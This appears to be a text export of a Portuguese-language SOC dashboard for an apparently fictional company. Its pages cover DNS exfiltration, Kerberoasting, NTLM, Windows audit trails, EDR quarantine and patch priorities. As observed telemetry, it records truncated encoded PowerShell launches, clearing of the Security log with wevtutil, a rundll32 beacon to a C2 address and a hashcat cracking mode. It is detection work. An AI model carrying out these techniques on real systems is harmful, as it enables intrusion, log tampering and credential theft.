214domínios <30 d9 allowlist · 12 DGA > 0,8
12TXT > 180 B2 fora de SPF/DKIM
TXT214 B
k2j9x.pull.xj3k9f[.]top
payload "TVqQAAMAAAAEAAAA//8AALgA…" · base64 → header MZ (PE)
BLOQUEADOhist. EV-0142
TXT198 B
_sig.telemetria-sync[.]net
payload "eyJob3N0IjoicGR2LWZpbDA3…" · base64 → {"host":"pdv-fil07-03"…}
EM ANÁLISETK-30474
TXT189 B
vetria.com.br
payload "v=spf1 include:spf.protection.outlook.com ip4:200.201.10.0/24 -all"
LEGÍTIMOSPF · e-mail
NX642/h
wks-fab-109 · rajada NXDOMAIN · 02h10
sufixos aleatórios .top/.xyz · candidato DGA sem C2 vivo · EID 22
EM ANÁLISETK-30469
NOVO6 d
atualizacao-vetria[.]com
registro 14/07 · MX + A ativos · typosquat de vetria.com.br
TAKEDOWNTK-30461
TXT > 180 B fora de SPF/DKIM abre caso automático (PB-13) · 12 hoje: 2 suspeitos · 10 legítimos (SPF/DKIM/verificação)

Egress Fora do Proxy · 443/53 direto

fgt-mtz-01 · policy-id 47 DENY-DIRECT · 24h
hostdestino · protocolosessõesbytes outestado
wks-fab-104
fábrica Jundiaí
203.0.113.88:443
TLS sem SNI · JA3 e7d7…41aa
96
41,2 MB
HISTÓRICO · EV-0142qui 17/07 · reimagem 18/07
pdv-fil07-03
filial 07 · PDV
198.51.100.77:443
TLS 1.2 · JA3 raro 3f9a…c2d0
212
8,4 MB
EM ANÁLISEhoje 09h14 · TK-30474
srv-bkp-01
DC Jundiaí
203.0.113.9:53
DNS/UDP · resolver hardcoded
1.412
0,3 MB
EXCEÇÃO ABERTAGMUD-2291 · qua 23/07
wks-fab-107
fábrica Jundiaí
dns.cloud-dns[.]com:443
DoH · negado na policy 47
84
1,1 MB
DoH BLOQUEADOPOL-EGRESS-04
srv-mail-01
DMZ · SMTP
198.51.100.23:443
TLS · mesmo destino do beacon
1.440
12,6 MB
VÍNCULO TK-3046760 s · cdn-metrics[.]io
POL-EGRESS-04: 443/53 só via proxy px-mtz-01 (3 exceções em allowlist) · pdv-fil07-03 nunca havia falado direto — Yasmin R. valida com a filial até 18h

Resolvers & Volume · 41M/24h

syslog DNS dos DCs · 4 respondedores vistos na rede
dc-jdi-01
PDC · fábrica Jundiaí
25,0M · 61,0%
dc-spo-01
DC SP · colocation
12,7M · 31,0%
dc-mtz-01
matriz SP
3,2M · 7,7%
10.20.61.44:53
fora do AD · sem CMDB
118k · 0,3%
3,0M1,5M0
pico 2,9M/h · 02h · backup + varredura
agora 1,8M/h
15h19h23h03h07h11h15h12
⚠ 10.20.61.44 responde DNS fora do AD — mesmo host do poro 8443 (R-163 · RITM-2201) · TK-30482 · bloqueio na GMUD ter 22/07 22h · Douglas M.
DNS logs dos DCs + FortiGate DNS filter + Sysmon EID 22 · 41M consultas/24h · janela 24h · Grupo Vetria · dom 20/07 15:12
EV-11 · 11 de 17
Grupo Vetria / Segurança & SOC / Kerberos & NTLM
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Mapa de Calor de TGS por SPN · watch de kerberoasting

6 DCs → Wazuh · EID 4769 · dedup por SPN · 24h · top-12 = 96% do volume
TGS · 4769 · 24h1,9Mméd 79k/h · pico 08h · 6 DCs
TGT · 4768 · 24h214krazão TGS/TGT 8,9× · dentro do baseline
Tickets RC4 · 0x17312100% → MSSQLSvc · 03h02–03h18
SPNs em watch3TK-30470 · abertura Vigia8 03h26
⚠ RC4 (0x17) = ticket cifrado com o hash NT da conta de serviço — exportável p/ cracking offline (hashcat -m 13100) · AES256 (0x12) inviabiliza o ataque
▸ wzh-mgr-01 · wazuh-alerts-4.x · q: eventID:4769 AND ticketEncryptionType:"0x17" AND NOT serviceName:"krbtgt" · janela 24h → 312 hits · 4 contas · 1 SPN
CIFS/srv-arq-01.vetria.corp
conta: SRV-ARQ-01$ (máquina) · rotação 30d · AES-only
486,2kTGS
24h
0x12 AES256 · 100%2.104 contas
arquivos + fiscal · DFS · perfis de rede · pico 08h–11h acompanha o expediente
SAUDÁVEL#1 em volume · 25,6% do total
HOST/dc-jdi-01.vetria.corp
conta: DC-JDI-01$ · PDC emulator · AES-only
322,4kTGS
24h
0x12 AES256 · 100%1.877 contas
GPO · SYSVOL · NETLOGON · replicação com dc-jdi-02 em 00:01
SAUDÁVELauth JDI 47% do domínio
MSSQLSvc/srv-erp-01.vetria.corp:1433
conta: svc-protheus · senha 412d · RC4+AES permitidos
214,8kTGS
24h
AES256 · 214,5k0x17 RC4 · 312
RC4 pedido por 4 contas: m.tavares · l.prado · c.duarte · r.gusmao · 03h02–03h18 · origem wks-fab-109 (10.20.61.109) → ALR-8843
KERBEROASTING PROVÁVEL · TK-30470pico 03h
LDAP/dc-spo-01.vetria.corp
conta: DC-SPO-01$ · colocation SP · AES-only
172,3kTGS
24h
0x12 AES256 · 100%binds de app
microserviços do portal e ERP fazem bind LDAPS 636 · service discovery
SAUDÁVELcanal assinado · LDAPS
HTTP/nfe.vetria.corp
conta: svc-nfe · senha 88d · AES-only · gMSA planejada
158,1kTGS
24h
0x12 AES256 · 100%CRÍTICO P/ FATURAMENTO
emissão NF-e / SEFAZ-SP · R$ 138k/h de parada · delegação restrita (constrained)
SAUDÁVELmigração p/ gMSA na fila de set/26
CIFS/srv-bkp-01.vetria.corp
conta: SRV-BKP-01$ · job de fita 02h · AES-only
121,7kTGS
24h
0x12 AES256 · 100%pico 02h
correlato ao pico de 23,4k EPS às 02h (backup + varredura) · imutável testado 12/07
SAUDÁVELjanela 02h–04h · srv-bkp-01
exchangeMDB/srv-mail-01.vetria.corp
conta: svc-exchange · senha 918d · RC4 habilitado
96,3kTGS
24h
AES256 · 100% hojeRC4 habilitado
roastable: senha de 918d + 0x17 permitido no atributo msDS-SupportedEncryptionTypes
WATCH · TK-30470remoção do RC4 na GMUD 2260
HTTP/portal-vetria.vetria.corp
conta: svc-portal · senha 380d · RC4 habilitado
88,9kTGS
24h
AES256 · 100% hojeRC4 habilitado
03h04 · as mesmas 4 contas pediram TGS (AES retornado) — enumeração da mesma campanha
WATCH · enumerado 03h04DMZ · WAF à frente
MSSQLSvc/srv-folha-01.vetria.corp:1433
conta: svc-folha · senha 132d · AES-only
64,2kTGS
24h
0x12 AES256 · 100%Folha Senior
picos nos dias 05 e 20 (fechamento da folha) · janela hoje dentro do esperado
SAUDÁVELacesso restrito ao grupo RH-folha
HOST/srv-erp-01.vetria.corp
conta: SRV-ERP-01$ · agendador + WinRM · AES-only
58,6kTGS
24h
0x12 AES256 · 100%tasks + WinRM
volume plano 24h · integrações do Protheus · sem sazonalidade de expediente
SAUDÁVELWinRM só da VLAN de gestão
TERMSRV/srv-arq-01.vetria.corp
conta: SRV-ARQ-01$ · RDP administrativo via PAM
21,4kTGS
24h
0x12 AES256 · 100%42 sessões
RDP sempre intermediado pelo PAM · gravação de sessão ativa · 0 acesso direto
SAUDÁVELNLA obrigatório
IMAP/srv-mail-01.vetria.corp
conta: svc-exchange · clientes móveis legados
12,8kTGS
24h
0x12 AES256 · 100%118 clientes
só filiais · maioria PDV com coletor de e-mail · candidato a desativação
SAUDÁVELestudo de desativação em ago/26
✎ caça TK-30470 (Vigia8 03h26 → Renata C. 14h10): senha das 4 contas suspeitas expirada às 03h40 · rotação de svc-protheus (28 chars) na GMUD 2260 · hoje 22h · RC4 removido do atributo dos 3 SPNs no mesmo change

Emissão de tickets · 4768 × 4769 · 24h

6 DCs → wzh-mgr-01/02 · bucket 1h · TGS 1,9M · TGT 214k
160k120k80k40k0
ev/h · esq. TGS 4769 · dir. TGT 4768 (tracejado)
03h02–18 · 312 TGS RC4 → MSSQLSvc · invisível no volume
02h · backup + varredura
pico 152,4k ev/h · 08h · expediente
agora 15h12 ▾
20k15k10k5k0
00h04h08h12h16h20h23h
4769 TGS · eixo esq.4768 TGT · eixo dir.rajada RC4 · 03hexpediente 08–19h

NTLM Legado · autenticações 24h

EID 4624 · pacote NTLM · v1: 118 em 12 hosts · v2 fallback 1.546 · signing OFF: 3
hostpacoteauths 24htendênciadetalheação
wks-fab-101
10.20.61.101 · fábrica
NTLMv1
34
Win7 SP1 · sem EDR · compensação: VLAN OT
SMB SIGNING OFF
wks-fab-107
10.20.61.107 · envase L2
NTLMv1
28
Win7 · IHM da linha 2 · scan qui 22h: CVE-2017-0144 exposto (KEV)
SMB SIGNING OFF
wks-fab-103
10.20.61.103 · balança
NTLMv1
19
Win7 · balança rodoviária · driver 32-bit sem suporte
SMB SIGNING OFF
+9 hosts legados
VLAN OT · Win7 · fábrica
NTLMv1
37
plano: isolar VLAN OT · corte de NTLMv1 no switch de acesso
GMUD 2258 · 26/07
srv-arq-01
10.20.4.21 · DC Jundiaí
NTLMv2
1.204
fallback Negotiate→NTLM · app fiscal VB6 · TK-29984
EM MIGRAÇÃO
pdv-fil07-03
10.20.107.13 · filial 07
NTLMv2
342
driver de impressora fiscal · mapeado · aceito pelo risco
RISCO ACEITO
✎ NTLMv1 expõe hash p/ relay/cracking · LmCompatibilityLevel=5 nos 6 DCs · isolar VLAN OT: GMUD 2258 · dono: infra-redes · Douglas M.

Falhas Kerberos & validação NTLM

EID 4771/4776/4768 · 4771: 900/24h · méd 38/h · Wazuh
eidcódigoconta / origem24htendênciadetalheação
47710x18 PREAUTH
svc-backup
← 203.0.113.44/.51
611
rajada 02h–04h vs vpn-forti-01 · correlata às 2.417× 4625 do spray
SOC-2214
47710x18 PREAUTH
j.santos
wks-mtz-218 · matriz
12
typo pós-férias · 08h12–08h20 · resolvido no service desk
NORMAL
47710x12 REVOKED
p.moraes
desligado 11/07
31
task agendada órfã em srv-arq-01 (EID 4698) · a cada 45 min
TK-30501
47760xC000006A
impressora-fab-02
fila de impressão
208
senha expirada qui 17/07 · spooler tenta a cada 7 min
TK-30488
47680x25 SKEW
4 hosts · drift
wks-fab-105/108/111 · pdv-fil07-03
57
KRB_AP_ERR_SKEW · drift +6–9 min · NTP da VLAN OT desalinhado
TK-30455
47710x18 PREAUTH
outras 209 contas
cauda · 43 sites
246
≤3 falhas/conta · ruído de digitação · dentro do baseline 7d
BASELINE
✎ svc-backup: reset na GMUD de hoje 22h (SOC-2214 · Renata C.) · task de p.moraes removida 14h58 · NTP OT: TK-30455

Política de Tickets · domínio

GPO Default Domain Policy · coleta PowerShell 06h · VETRIA.CORP
TGT lifetime10hticket de serviço 600 min · padrão · sem exceções por OU
Renovação máx7dMaxRenewAge padrão · renovações 24h: 11,2k · 0 anômalas
Delegação irrestrita2 contassrv-app-legado + svc-scan · remoção TK-30298
krbtgt · último reset214dmeta <180d · reset sáb 26/07 23h · aprov. pendente
✎ krbtgt: GMUD 2261 aguarda a CAB de ter 22/07 · executor: Marcos P. · 2º reset só após 10h de replicação
DCs 4768/4769/4771/4776 → Wazuh · 2,1M eventos Kerberos/24h · domínio VETRIA.CORP · Grupo Vetria · dom 20/07 15:12
EV-12 · 12 de 17
Grupo Vetria / Segurança & SOC / Auditoria Windows
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Trilha de Mudanças Suspeitas · 24h

Security 4720/4732/4719/7045/4698/1102 + Sysmon 13 → Wazuh · vet-persist-01..06
◄ Mudança controlada · GMUD / rollback Mudança suspeita · análise / bloqueio ►
hostilaprovadarevertida
▲ sáb 19/07 · 15h 16h 20h 00h · dom 04h 08h 12h 15h12 ▾
Mudanças de persistência · 24h
2115 conciliadas GMUD/baseline
6 na trilha · 2 sob investigação
eventID:(7045 4698 4719 4720 4732 1102) AND NOT gmud.matched:true
7045×6 · 4698×11 · 4719×1 · 4720×1 · 4732×1 · 1102×1 · dedup host+objeto
janela 14h → 3 mudanças em 33 min · 1 aprovada (4732) · 2 hostis (1102 · 4698)
7045 criado 56 min antes do pico do spray (03h10) · mesma janela 02h–04h · origem em análise
sáb 22h044720Conta de serviço criada · svc-integraAPROVADA · GMUD 2260
dc-jdi-01·poradm-ti-01 (PAM)·origemNew-ADUser · PS 7.4
OU=Servicos,DC=vetria,DC=corp · senha 32c no cofre PAM · logon restrito a srv-erp-01 · janela 22h
09h324719Política de auditoria alteradaREVERTIDA · AUTO
dc-spo-02·porSYSTEM (auditpol.exe)·sessãoconsole local
Object Access › Removable Storage: Success → OFF · fora de GMUD · rollback PB-14 · 09h34 · diff na GPO-AUDIT-DCs
14h224732Membro adicionado a 'Domain Admins'APROVADO · Renata C.
dc-jdi-01·adm-ti-02→ Domain Admins·poradm-ti-01
SID S-1-5-21-…-512 · JIT via PAM · expira 18h00 · Tier-0 sempre entra na trilha, mesmo aprovado
02h147045Serviço novo · 'WinSockDrv'EM ANÁLISE · TK-30481
srv-arq-01·porSYSTEM·origempowershell.exe -nop -w hidden
ImagePath: C:\ProgramData\WinSock\wsdrv64.exe · sha256 9f2a71…c44b · não assinado · start=auto
14h271102Log Security apagadoINVESTIGAÇÃO · TK-30412
srv-folha-01·pord.oliveira·origemwevtutil.exe cl Security
7 min após export da base RH (ALR-8838 · 14h20) · cópia íntegra preservada no Wazuh · retenção 90d
14h554698Task agendada · 'AdobeUpdater2'BLOQUEADA · EDR
wks-fab-109·porc.menezes·origemwinword.exe → powershell.exe
ação: powershell -nop -w hidden -enc SQBFAFgA… · gatilho ONLOGON · bloqueio por comportamento · correlato ALR-8843
✎ Douglas M. detona wsdrv64.exe na sandbox (TK-30481 · resposta até 16h) · 1102 com N2 + jurídico (TK-30412) · Tier-0 e fora-de-GMUD entram sempre na trilha — as 15 conciliadas ficam fora

Objetos Sensíveis · acessos auditados (4663)

SACL VET-SENSIVEL · Event Viewer Security → Wazuh · janela 24h
8,4Meventos 4663 · 24h
168sinalizados · 0,002%
2tentativas negadas
41caminhos na SACL
rule.level>=7 AND data.win.system.eventID:4663 AND data.win.eventdata.objectName:@VET-SENSIVEL
objeto · contextocontaacessovol 24h7 dveredito
C:\Windows\NTDS\ntds.ditdc-jdi-01 · 04h02 · 52 min após pico do spray · handle 0x0 (falha)
svc-backup
R
3tent. negadas
NEGADA · ACLSOC-2214 · Renata C.
\\srv-folha-01\RH\Base_Colaboradores_2026.csvexport 14h20 · 8.212 linhas · 38 MB · origem excel.exe
d.oliveira
R
1export · 38 MB
INVESTIGAÇÃOTK-30412 · N2
C:\ProgramData\WinSock\wsdrv64.exesrv-arq-01 · 02h14 · gravado por powershell.exe · vínculo 7045
SYSTEM
W
1gravação
EM ANÁLISETK-30481 · Douglas M.
\\vetria.corp\SYSVOL\…\{31B2F340…}\GptTmpl.infDefault Domain Policy lida por conta de serviço · 1ª vez em 90d
svc-arquivos
R
12leituras
FORA DO PADRÃOAline F. · verificação
\\srv-arq-01\Financeiro\Fechamento_Q2.xlsxconta criada há 17h (GMUD 2260) · integração ERP→BI · observação 7d
svc-integra
R
214leituras
CONTA NOVA · 17hwatchlist até 27/07
\\srv-folha-01\RH\Holerites\2026-07\processamento da folha · janela dom 08h–12h · Senior
svc-folha
RW
12.408r/w
BASELINEjob folha · dom
\\srv-arq-01\Qualidade\Laudos\2026\indexação de conteúdo a cada 4h · job idx-arq
svc-arquivos
R
18.412leituras
BASELINEindexador
\\vetria.corp\SYSVOL\scripts\logon.ps1GMUD 2261 · hash pós-mudança sha256 3db1…9e02 ✓
adm-ti-01
W
2gravações
GMUD 2261conferido 21h58
✎ ntds.dit negada p/ svc-backup → reforça o reset na GMUD de hoje 22h (dono: Marcos P.) · export RH segue com N2 (TK-30412) · revisão da SACL: trimestral · próxima 15/09

Serviços & Tasks novos · 30d

7045 + 4698 → Wazuh · hoje 6 + 11 · baseline 2,1/dia
12,08,04,00
barras = 7045 · linha = 4698 hoje: 6 (7045) + 11 (4698) qui 17/07 · EV-0142 baseline 7045 · 2,1/dia
21/0628/0605/0712/0720/07
serviços de hoje · 70456 novos · 5 conciliados
02h14WinSockDrvsrv-arq-01não assinadoTK-30481
08h12ZabbixAgent2srv-bkp-01assinado ✓GMUD 2262
09h47EdrUpdaterSvcwks-fab-103assinado ✓ROLLOUT EDR
11h32edgeupdatepdv-fil07-03assinado ✓BASELINE
12h48PrintWorkflow_2a4fwks-fab-111per-userBASELINE
13h27FortiClientUpdatewks-fil22-04assinado ✓GMUD 2263
✎ pico de 4698 hoje: 9 das 11 tasks são o rollout do agente EDR (GMUD 2263) · única não conciliada: WinSockDrv · TK-30481

Mudanças de GPO · semana 29

diff SYSVOL 15 min + 5136/4719 → Wazuh · 5 mudanças · 4 aprovadas
dom 09h32GPO-AUDIT-DCsauditpol local em dc-spo-02 · fora de GMUDREVERTIDA · PB-14
Object Access › Removable StorageSuccessOFFv87→v88 · rollback v89 · 09h34
sex 18/07GPO-FIL-Estacoes19h55 · adm-ti-01 · GMUD 2264PILOTO · GA 15/08
Detailed Tracking › Process CreationOFFON + cmdlinev54→v55 · 3 filiais
qui 17/07GPO-SEC-Estacoes21h04 · adm-ti-02GMUD 2255
User Config › ScreenSaverTimeout900600 sv118→v119
ter 15/07GPO-SRV-Hardening21h38 · adm-ti-01GMUD 2252
Features › SMB1Protocol-ClientEnabledDisabledv72→v73 · 374 srv
seg 14/07Default Domain Policy22h10 · adm-ti-01GMUD 2249
Account Policies › MinPasswordLength1014v201→v202
✎ mudança sem GMUD dispara vet-gpo-002 (nível 12) + rollback PB-14 · dono: infra AD · PDC dc-jdi-01

Cobertura de Auditoria · por perfil

auditpol via SCA → Wazuh · 4 perfis × 5 categorias · 2 gaps
perfillogon 4624-25objeto 4663política 4719privilégio 4673proc. 4688
DCs6 hosts · GPO-AUDIT-DCs
S+F11/11 subcat
S+FSACL 41 obj
S+F+5136 dir. svc
Ssó sensíveis
ON+cmdline
Servidores374 hosts · GPO-SRV-*
S+FRDP/SMB/local
S+F41 caminhos
S+FGPO+local
Spor desenho
ON+cmdline
Estações · mtz+fáb1.850 hosts
S+Flogon local
SSACL mínima
S+FGPO
OFFdesenho · ruído
ON+cmdline
Estações · filiais1.970 hosts · 38 sites
S+Flogon local
PARCIALPDVs sem SACL
S+FGPO
OFFpor desenho
OFFplano 15/08
✎ ligar 4688 nas filiais ≈ +2,1M ev/dia no indexer — capacidade validada · piloto 3 filiais desde 18/07 · GA 15/08 · GMUD 2264 · dono: infra
Event Viewer Security + Sysmon → Wazuh · 4663/7045/4698/4719/4720/4732/1102 · janela 24h–30d · Grupo Vetria · dom 20/07 15:12
EV-13 · 13 de 17
Grupo Vetria / Segurança & SOC / Quarentena EDR
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Mesa de Quarentena · 7 itens retidos

EDR console · política QUAR-30d · sha256 · engines: comportamento · assinatura · ML
edr.event=quarantine AND (window:24h OR legal_hold:EV-2026-0142) | sort veredito.score desc7 resultados · 0,3 s
4retidos · quarentena
2em custódia · EV-0142
2aguardando decisão
1restaurado · 2 aprov.
23detecções 24h · 7 quarent.
9,8maliciososcore /10
fatura_0687.docmCOMPORTAMENTOEVIDÊNCIA PRESERVADA · CUSTÓDIAqui 17/07 · 14h05
sha256 4c19f2…8b3d · 412 KB · Behav:W97M/OfficeSpawn.PS · vetor do EV-2026-0142
wks-fab-104 · claudio.n · C:\Users\claudio.n\Downloads\fatura_0687.docm
vet-100482 nv14 · T1566.001 → T1059.001 · winword.exe → powershell.exe -nop -w hidden -enc JAB…
QUARENTENA · LEGAL HOLD
exportar só p/ perícia · TK-30421 cadeia de custódia ok · retenção suspensa
9,6maliciososcore /10
upd.dllCOMPORTAMENTOEVIDÊNCIA PRESERVADA · CUSTÓDIAqui 17/07 · 14h12
sha256 9f2a71…c44b · 86 KB · Behav:Win32/Rundll32.C2 · hash 1 de 8 na lista de bloqueio
wks-fab-104 · SYSTEM · C:\Users\Public\upd.dll
vet-100517 nv15 · T1218.011 · rundll32.exe upd.dll,DllRegisterServer → 203.0.113.88:443 · Sysmon EID 7/3
QUARENTENA · LEGAL HOLD
exportar só p/ perícia · TK-30421 push do hash 14h21 · EDR + FortiGate
9,1maliciososcore /10
inv0ice_padrao.xlsmASSINATURAhoje · 14h47
sha256 b3d84f…9f2e · 1,1 MB · Trojan:X97M/DownLdr.GEN · IOC hash · feed comercial (MISP)
pdv-fil07-03 · caixa.fil07 · C:\Users\caixa.fil07\AppData\Local\Temp\inv0ice_padrao.xlsm
PB-05 · AUTO · hit em 48.213 IOCs ativos · bloqueado on-access · TTL do IOC 30d · vínculo ALR-8824
QUARENTENALGPD · PDV
apagar após retenção 30d quarentena via SOAR PB-05 · sem ação pendente
8,7maliciososcore /10
crack_autocad.exeASSINATURAhoje · 11h18
sha256 d71c02…5aef · 24,6 MB · HackTool:Win32/Keygen.AC!MTB · sem execução (bloqueio on-access)
wks-mtz-217 · p.siqueira · D:\downloads\crack_autocad.exe
on-access 0,4 ms · política PIRATARIA-DENY · notificação ao gestor enviada 11h20 · RH em cópia
QUARENTENA
apagar após retenção 30d reincidência: 2ª no host em 90d
6,8suspeitoscore /10
macro_rh.docmMLAGUARDANDO DECISÃOhoje · 13h05
sha256 77e0b4…12c9 · 388 KB · ML score 0,68 (corte 0,60) · sem IOC correspondente
srv-folha-01 · m.castro · \\srv-folha-01\rh\modelos\macro_rh.docm
features · macro AutoOpen + POST http 10.20.8.14:8080 (interno) · contém dado pessoal · LGPD
DECIDIR ATÉ 17h30LGPD
restaurar (2 aprov.) ou apagar · TK-30498 dona: Aline F. · valida com RH
6,1suspeitoscore /10
ad_sync.ps1COMPORTAMENTOAGUARDANDO DECISÃOhoje · 05h31
sha256 3fa9d0…7b21 · 6 KB · Behav:PS/LDAPEnum.B · task 4698 diária 05h30
srv-erp-01 · svc-protheus · C:\Scripts\ad_sync.ps1
vet-100244 nv10 · System.DirectoryServices + credencial em claro na linha 41 · sem assinatura digital
DECIDIR ATÉ 18h00
restaurar (2 aprov.) ou apagar · TK-30489 dono: Douglas M. · confirma com infra-ERP
5,4suspeitoscore /10
driver_hp_2026.msiASSINATURARESTAURADO COM APROVAÇÃOhoje · 09h58
sha256 c2481e…d90a · 48,2 MB · Gen:Variant.Fugrafa.118 (heurística) · falso positivo confirmado
wks-fil22-08 · k.tanaka · C:\Users\k.tanaka\Downloads\driver_hp_2026.msi
análise · assinatura digital válida (HP Inc. · cadeia ok) · hash liberado por 90d · FP reportado ao fabricante do EDR
RESTAURADO · 11h32
liberação expira 18/10 · reavaliar aprovado: Renata C. + Túlio B. · TK-30455
decisão do plantão: ad_sync.ps1 (Douglas M. · TK-30489) e macro_rh.docm (Aline F. · TK-30498) decididos até 18h00 · restauração exige 2 aprovações + ticket · itens em custódia só saem por perícia · TK-30421

Detecções por engine · 30 dias

EDR console → Wazuh · rule.groups:edr AND rule.level>=7 · méd 19,5/dia
60,045,030,015,0
23detecções · 24h
comportamento 11 assinatura 8 ML 4
qui 17/07 · EV-2026-0142 · 57 det31 comportamento · 8 hashes → bloqueio
méd 30d · 19,5/dia
Y: detecções/dia · X: 21/06 → 20/07
21/0628/0605/0712/0717/0720/07

Exclusões ativas · 6 de 34

EDR policy EPP-BASE v12 · 3 sem hash · em revisão · auditoria trimestral
path / processo · motivoidadedonohits 7destado
C:\ERP\temp\*.exe
pedida pelo fornecedor Protheus · sem hash
2a 4m infra-ERP 214
EM REVISÃOTK-30474 · vence 25/07
powershell.exe · C:\Scripts\*
scripts de infra sem assinatura · processo+path
1a 1m infra-TI 96
EM REVISÃOTK-30476 · vence 25/07
C:\LabVetria\coletor\*.exe
coletor OT · chão de fábrica · wildcard + exe
3a 2m eng-fábrica 38
EM REVISÃOTK-30479 · VLAN OT
C:\Program Files\Senior\rubi\*.dll
FP recorrente na folha · hash fixado
8m RH/TI 41
ATIVAhash fixado · ok
C:\SEFAZ\nfe\out\*.xml
perf · 40k XML/dia no on-access
1a 9m fiscal 38,4k
ATIVArevalidada 04/07
D:\veeam\*.vbk · srv-bkp-01
perf de I/O · full na janela 02h
2a 0m infra-backup 129
ATIVAfull sáb 02h · imutável
auditoria dom 20/07: 34 exclusões · 3 sem hash vencem 25/07 (decisão: infra-ERP + SOC · TK-30474/76/79) · regra nova GMUD-4471: exclusão exige hash ou assinatura digital

Varreduras & motor

EDR scheduler · full-scan dom 03h00 · push de assinaturas 2×/dia
Full-scan · dom 20/07 03h00
96,4%concluída · 4.037 hosts vivos
3.892 concluídos · 145 reagendados dom 27/07 (notebooks desligados)
duração méd 1h38 · 12 Win7 fora do escopo · sem EDR · VLAN OT
on-access · latência0,4 ms
média 24h · p95 1,8 ms · p99 4,1 ms · 8,4M eventos 4663/24h
base de assinaturas20260720.2
último push hoje 14h02 · 3.998 ok · 39 atrasados >24h
versão do agente7.4.1182
92,1% em 7.4 · 5,8% em 7.3.9 · 2,1% ≤7.2 (fila de rollout)

Isolamentos de rede · 30 dias

EDR response · network-contain · playbook PB-06 · 3 eventos
qui 17/0714h12 wks-fab-104
EV-2026-0142 · beacon C2 203.0.113.88:443 · contenção via EDR network-contain
SEGUE ISOLADO · FORENSEreimage TK-30421 · libera: perícia
ter 08/0709h24 wks-mtz-152
falso-alarme · assinatura Gen:Variant em instalador NF-e · usuário fiscal
REVERTIDO · 17 MIN09h24 → 09h41 · aprovado Renata C.
qua 02/0711h03 wks-fab-107
falso-alarme · comportamento: agente de inventário OT varrendo SMB
REVERTIDO · 12 MIN11h03 → 11h15 · exclusão por hash
1 procedente · 2 falso-alarme revertidos em <20 min · média de reversão 14,5 min · reversão exige aprovação N2
EDR console + Wazuh · 23 detecções/24h · 7 em quarentena · 34 exclusões (3 em revisão) · Grupo Vetria · dom 20/07 15:12
EV-14 · 14 de 17
Grupo Vetria / Segurança & SOC / Vulnerabilidades
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Quadrante de Priorização · CVSS × EPSS

Wazuh vuln-detector · scan autenticado qui 22h · EPSS v3 FIRST · KEV CISA · 1.842 CVEs
1.842 CVEs abertos · parque 4.200 endpoints · último scan qui 22h04 43 crit · 312 high · 890 med · 597 low · Δ 7d: −38 AGIR AGORA · 28 CVEs · 14 KEV CVE-2023-4966 · Citrix Bleed · 9,4 / 0,92 NetScaler ADC do portal B2B (2 appliances) · KEV IPS segurando: 214 hits/24h · GMUD emergencial ter 22/07 21h CVE-2021-44228 · Log4j · 10,0/0,97 · 2 apps em análise · TK-30799 CVE-2020-1472 · Zerologon · 10,0 / 0,88 residual: dc-dr-01 (DR) · plano set/26 · exceção assinada CVE-2024-21413 · Outlook RCE · 9,8 / 0,71 1.240 hosts matriz · rollout 61% · TK-30877 · SLA +2d anel = KEV (CISA) · 3 fora do quadrante seguem na fila prioritária 1.520 CVEs com EPSS < 0,15 — patch no ciclo mensal · WSUS 0,01,02,03,04,05,06,07,08,09,010,0 0,00,20,40,60,700,81,0 CVSS v3.1 · base score → EPSS v3 · probabilidade de exploração · 30 dias ↑
EPSS < 0,150,15–0,400,40–0,70≥ 0,70 · agiranel = KEV1 ponto = 1 CVE · amostra 244 de 1.842 · quadrante completo (28)
▶ prioridade da semana: GMUD-1189 · Citrix ADC ter 22/07 21h (dono: infra-web · aprovada dir. TI 18/07) · rollout Outlook TK-30877 até sex 25/07 · exceções revistas seg 09h — Renata C.

Esteira de Patch · campanhas ativas

WSUS · GPO · GMUDs ITSM · SLA crit 7d / high 30d
campanhaalvoaplicadojanelafalhas · motivosla
Citrix ADC 13.1-51.15
CVE-2023-4966 · portal B2B
0/2
0%
ter 22/07 21h
GMUD-1189
aguarda GMUD · IPS mitigando (214 hits/24h)
CRIT · 4d
KB5040442 · Win 10/11
CVE-2024-21413 +41 CVEs
1.944/3.187
61%
WSUS · contínua
anel 2/3
reboot pendente: 84 estações
CRIT · +2d
FortiOS 7.4.4
CVE-2024-21762 · fgt-*
5/40
12%
qui 24/07 22h
GMUD-1181
fgt-fil12-01 mudo há 3d — sem confirmação
HIGH · 21d
Chrome 126.0.6478.127
auto-update · gerenciado
2.731/2.904
94%
contínua
anel único
12 perfis travados · TK-30822
NO PRAZO
Java 8u411 · ERP
Protheus · srv-erp-01
71/187
38%
sáb 26/07
homologação
3 estações c/ app fiscal legado
HIGH · 11d
KB5040430 · Win Server
96 srv · dc-* · srv-*
45/96
47%
dom 27/07 03h
GMUD-1174
disco cheio: 3 (srv-arq-01 +2)
HIGH · 18d
Netlogon enforcement
CVE-2020-1472 · dc-dr-01
0/1
0%
migração DR
set/26
dep.: NTLMv1 118 auths/24h · 12 hosts
EXCEÇÃO
✎ 84 reboots consolidados na janela dom 27/07 03h (GMUD-1174) · disco: TK-30861 aberto p/ srv-arq-01 · dono da esteira: Douglas M. · falhas notificadas via SOAR PB-09

Aging por Severidade

MTTP · idade média dos 1.842 abertos
030d60d90d
média · meta
CRÍTICO43 CVEs
9d · meta 7d · +2d acimap90 21d · KEV com fila própria
ALTO312 CVEs
22d · meta 30d · ✓ dentrop90 44d · 28 vencem esta semana
MÉDIO890 CVEs
41d · meta 90d · ✓ dentrop90 76d · ciclo mensal WSUS
BAIXO597 CVEs
68d · sem meta — risco aceitorevisão trimestral · out/26
mais antigo: CVE-2019-0708 (BlueKeep) · srv-app-legado · aberto há 1.126d · aceite assinado

Top Ativos Expostos

crit+high por ativo · scanner + CMDB · dono nomeado
vulnerability.severity:(Critical OR High) AND vulnerability.score.base>=7 · index: wazuh-states-vulnerabilities-*
ativoc+hpior cve8 semdecisão registrada
srv-app-legado10.20.8.31 · W2008R2
34
CVE-2019-0708BlueKeep · RDP
